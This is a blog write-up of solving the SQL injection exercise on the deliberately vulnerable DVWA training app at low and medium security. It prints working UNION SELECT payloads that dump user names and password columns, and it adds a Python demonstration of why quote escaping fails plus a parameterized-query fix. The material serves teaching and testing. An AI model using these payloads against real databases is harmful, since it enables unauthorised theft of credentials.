Tuesday, February 21, 2012

DVWA - SQL Injection: Medium, solved.

On the low setting, the following works to extract the data from the first_name and password columns.

a' UNION ALL SELECT first_name, password from dvwa.users;#'

Thanks to hackyeah.com (http://www.hackyeah.com/2010/05/hack-yeah-sql-injection-walkthrough-dvwa) for getting me past the low setting. Great article.

If we try the same injection with security set to medium, we get back a MySQL error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' UNION ALL SELECT first_name, password from dvwa.users;#' at line 1

After a little trial, error and dumb luck, taking away the first single quote works. In fact, taking away the second works as well. The below statements all worked for me on medium using DVWA 1.0.7.


1 UNION ALL SELECT first_name, password from dvwa.users;#'
1 UNION ALL SELECT first_name, password from dvwa.users;#
1 UNION ALL SELECT first_name, password from dvwa.users;
1 UNION ALL SELECT first_name, password from dvwa.users
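
Why dropping the quote works, and how to close the hole, as an added example that is not part of the original post or DVWA's own code. It assumes the medium-level query escapes quote characters but places the id in the WHERE clause without surrounding quotes; sqlite3 stands in for MySQL, the table rows are constructed, and all function names are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed sample data; sqlite3 stands in for the MySQL backend.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT,"
               " last_name TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)",
                   [(1, "admin", "admin", "hash-admin"),
                    (2, "Gordon", "Brown", "hash-gordon")])
    return db

def escape_quotes(value):
    # Simplified model of quote escaping: put a backslash before \ ' and ".
    for ch in ("\\", "'", '"'):
        value = value.replace(ch, "\\" + ch)
    return value

def lookup_escaped_unquoted(db, user_input):
    # Assumed medium-style query: input is escaped, but the id sits in a
    # numeric context with no quotes around it, so escaping protects nothing.
    sql = ("SELECT first_name, last_name FROM users WHERE user_id = "
           + escape_quotes(user_input))
    return db.execute(sql).fetchall()

def lookup_parameterized(db, user_input):
    # Fix: accept only an integer and bind it as a parameter.
    try:
        user_id = int(user_input)
    except ValueError:
        return []
    return db.execute("SELECT first_name, last_name FROM users"
                      " WHERE user_id = ?", (user_id,)).fetchall()

# The post's inputs, adapted to the constructed table (no dvwa. prefix, no #).
QUOTED = "a' UNION ALL SELECT first_name, password from users"
UNQUOTED = "1 UNION ALL SELECT first_name, password from users"

def demo():
    db = make_db()
    out = {}
    try:
        out["quoted"] = lookup_escaped_unquoted(db, QUOTED)
    except sqlite3.OperationalError as exc:
        out["quoted"] = "syntax error: %s" % exc   # the stray backslash
    out["unquoted"] = lookup_escaped_unquoted(db, UNQUOTED)  # leaks passwords
    out["fixed"] = lookup_parameterized(db, UNQUOTED)        # no rows
    return out

if __name__ == "__main__":
    print(demo())
```

The quoted input fails only because the escaping adds a backslash the parser cannot place; the unquoted input contains nothing to escape, so only type validation and parameter binding stop it.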

Happy pen testing.